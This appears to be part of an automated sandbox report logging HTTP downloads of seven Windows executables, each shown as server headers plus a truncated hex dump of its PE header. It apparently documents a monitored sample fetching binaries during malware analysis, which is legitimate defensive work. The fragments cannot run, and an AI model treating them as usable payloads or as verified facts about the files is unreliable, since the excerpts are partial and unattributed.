Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:50 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 3a 04 00 00 20 00 00 00 3c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 60 04 00 00 08 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5a 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 4c 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 5e 33 ca c7 5d b6 b8 aa c0 42 cb c3 33 0b b3 48 31 5e 98 60 61 56 0f 92 6a 82 28 58 df 07 60 f0 92 b4 76 4b 29 da f1 67 41 d3 57 ca 7f a1 a3 7d 2a 3c 88 9e 3c 4c e6 d1 87 f5 fd 80 b0 81 8c 25 ae fc 7d 78 0a 33 31 d8 74 bd 72 a0 3a cb a3 5d e1 8d fd 10 61 23 0e c6 21 b6 55 ef 9c cd 96 71 b7 e9 16 96 31 7e d9 bb 80 40 8a 9a 87 91 0f 58 92 28 9b e6 bb de e1 f4 f5 4c 6a f0 f2 94 44 dc c0 c3 b0 0f 41 fd 1c 92 ee cf d3 44 d2 77 a3 6b 01 73 c5 09 8b 45 26 fe 00 c7 4c 3a ec f1 9d f3 b2 fe 90 c8 69 f6 9b 9f c0 41 44 ae 6c ec ad 1d 3b c6 c8 38 cc be 56 e5 e2 9e 0f c1 50 ef 56 5a 6f ee 24 fa 7e 82 e4 3a 17 8b e1 0f 6b 90 1e 1f 9b b9 69 82 01 84 e1 aa 09 f6 a3 68 6f ae b9 93 81 0a a0 9d b1 6c 62 14 44 42 0e 4f 8d 0d 49 a4 76 a4 4b 73 22 04 5b e2 49 4f fa d0 58 ea 32 24 71 05 0e c8 0d 8b b2 ea 33 f4 a4 66 84 0d 16 12 a5 0f b9 8a 61 f9 c7 58 9e 3b d8 a9 ba 28 d5 e4 38 66 8d f1 6a 15 23 b6 6b d3 d7 67 e3 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:52 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:01 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:07 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
